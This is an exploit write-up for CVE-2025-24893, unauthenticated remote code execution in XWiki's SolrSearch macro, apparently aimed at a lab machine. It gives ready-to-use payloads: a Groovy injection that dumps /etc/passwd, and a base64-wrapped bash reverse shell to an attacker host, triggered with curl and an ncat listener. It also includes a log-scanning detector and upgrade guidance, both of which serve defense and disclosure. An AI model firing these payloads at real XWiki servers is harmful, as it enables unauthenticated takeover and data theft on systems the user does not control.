**9.8 / 10 CRITICAL** (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
# CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki
## 0 Table of Contents
1. [Summary](#1-summary)
2. [Vulnerability Details](#2-vulnerability-details)
3. [Affected Versions](#3-affected-versions)
5. [Proof of Concept](#5-proof-of-concept)
    * 5.1 [Build the payload](#51-build-the-payload)
    * 5.2 [Manual exploitation](#52-manual-exploitation)
    * 5.3 [Automated exploit](#53-automated-exploit)
6. [Mitigation](#6-mitigation)
7. [Credits & References](#7-credits--references)
---
## 1 Summary
* **CVE:** 2025-24893
* **Component:** `SolrSearch` macro (XWiki UI)
* **Severity:** 9.8 / CRITICAL (CVSS 3.1)
* **Attack vector:** Unauthenticated HTTP GET
* **Impact:** Arbitrary Groovy execution → system-level RCE (permissions of the Jetty/Tomcat user)
The `/xwiki/bin/get/Main/SolrSearch` endpoint concatenates untrusted `text=` input
straight into a Freemarker template.
By prematurely closing the template and opening a new `{{groovy}} … {{/groovy}}`
block, an attacker executes arbitrary Groovy code without authentication.
---
## 2 Vulnerability Details
```http
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=>> HTTP/1.1
```
`SolrSearch` should embed the supplied text as plain content, but the macro
handler **fails to escape `}}}`**, so the following happens:
1. `}}}` closes the current Freemarker block.
2. The attacker opens a **new macro**:
   ```xwiki
   {{async async=false}}{{groovy}} … {{/groovy}}{{/async}}
   ```
   * `async=false` forces synchronous execution (works even for guests).
3. Groovy runs with the permissions of the XWiki JVM process.
A minimal PoC that prints `/etc/passwd`:
```text
}}}{{async async=false}}{{groovy}}println("cat /etc/passwd".execute().text){{/groovy}}{{/async}}
```
URL-encoded variant (spaces → `%20`, braces → `%7B/%7D`, etc.):
```
%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
```
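Log-side detection for the request shape described above, added here as an example and not part of the original write-up: it walks access-log lines (combined Apache/Tomcat format is an assumption; the three sample lines are constructed, the second one reusing the page's URL-encoded PoC), decodes the `text=` parameter and flags a `}}}` close followed by an `{{async` or `{{groovy` macro open on the `SolrSearch` endpoint.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit
# The vulnerable endpoint; matched by suffix so a different servlet prefix still hits.
ENDPOINT_RE = re.compile(r"/bin/get/Main/SolrSearch$", re.IGNORECASE)
# Shape of the injection: a premature "}}}" close followed later by an async/groovy macro open.
INJECTION_RE = re.compile(r"\}\}\}.*?\{\{\s*(async|groovy)\b", re.IGNORECASE | re.DOTALL)
# Request field of a combined-format access log line (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable so a double-encoded payload is not missed."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target: str):
    """Return a finding dict if the request target carries the macro injection, else None."""
    parts = urlsplit(target)
    if not ENDPOINT_RE.search(parts.path):
        return None
    # parse_qs strips one encoding layer; fully_decode strips any further ones.
    for raw_text in parse_qs(parts.query, keep_blank_values=True).get("text", []):
        text = fully_decode(raw_text)
        match = INJECTION_RE.search(text)
        if match:
            return {"path": parts.path, "macro": match.group(1).lower(), "text": text}
    return None

def scan_access_log(lines):
    """Run inspect_request over each log line; return findings tagged with their line number."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        req = REQUEST_RE.search(line)
        finding = inspect_request(req.group("target")) if req else None
        if finding:
            finding["line"] = lineno
            findings.append(finding)
    return findings

# Constructed sample log: a normal search, the page's own PoC request, and a
# search that merely contains braces (must not be flagged).
SAMPLE_LOG = [
    '198.51.100.7 - - [07/Aug/2025:10:20:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=release%20notes HTTP/1.1" 200 2210',
    '198.51.100.9 - - [07/Aug/2025:10:20:05 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d HTTP/1.1" 200 1890',
    '198.51.100.7 - - [07/Aug/2025:10:21:12 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Bcode%7D%7D%20macro HTTP/1.1" 200 2050',
]
```

Feed `scan_access_log` the lines of your own access log; each finding carries the decoded `text` value so the injected macro body can be triaged directly.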
---
## 3 Affected Versions
| Branch | Fixed in | Vulnerable ≤ |
| -------- | ------------------------------------------ | -------------------------------- |
| 15.x | **15.10.11** | 15.10.10 (and all 15.9 / 15.8 …) |
| 14.x LTS | **14.10.17** | 14.10.16 |
| 13 / 12 | **Not maintained** – all remain vulnerable | |
*(source: [OffSec advisory](https://www.offsec.com/blog/cve-2025-24893/) & XWiki
SEC-S 2025-02)*

---
## 5 Proof of Concept
### 5.1 Build the payload
```bash
RHOST="editor.htb:8080"
LHOST="10.10.14.8"
LPORT=4444
# 1. one-liner reverse shell
SHELL="bash -c 'bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1'"
# 2. Base64 (single line)
B64=$(echo -n "$SHELL" | base64 -w0)
# 3. wrap in Groovy macro
RAW='}}}{{async async=false}}{{groovy}}"bash -c {echo,'$B64'}|{base64,-d}|{bash,-i}".execute(){{/groovy}}{{/async}}'
# 4. URL-encode
PAYLOAD=$(python3 -c "import urllib.parse,sys;print(urllib.parse.quote(sys.argv[1],safe=''))" "$RAW")
```
### 5.2 Manual exploitation
```bash
# start listener
sudo ncat -lvnp 4444
# trigger exploit
curl "http://$RHOST/xwiki/bin/get/Main/SolrSearch?media=rss&text=${PAYLOAD}"
```
### 5.3 Automated exploit
`xwiki_solr_rce.py` ships in `exploit/` (see code block below).
```bash
python CVE-2025-24893.py -u -l -p
```
where
```
- URL including http:// or https://
```
*(pass `-c "id"` to run an arbitrary command instead of a shell)*


---
## 6 Mitigation
* **Upgrade** to **15.10.11** / **14.10.17** or later
* Temporary workaround: disable the macro
```properties
# /etc/xwiki/xwiki.properties
solr.search.enabled = false
```
---
## 7 Credits & References
* OffSec Research: “Unauth RCE in XWiki” – 20 Feb 2025
* NVD entry: [https://nvd.nist.gov/vuln/detail/CVE-2025-24893](https://nvd.nist.gov/vuln/detail/CVE-2025-24893)
* [Exploit-DB #52136](https://www.exploit-db.com/exploits/52136)
> Research & PoC: **DeX1d**
---
> Disclaimer: For educational use only. Running this against systems you do not own is illegal.
ID: 3FC9E9A2-42CE-552A-A046-E205E2471000 · Published: Aug 7, 2025 at 10:20 · Modified: Aug 9, 2025 at 10:15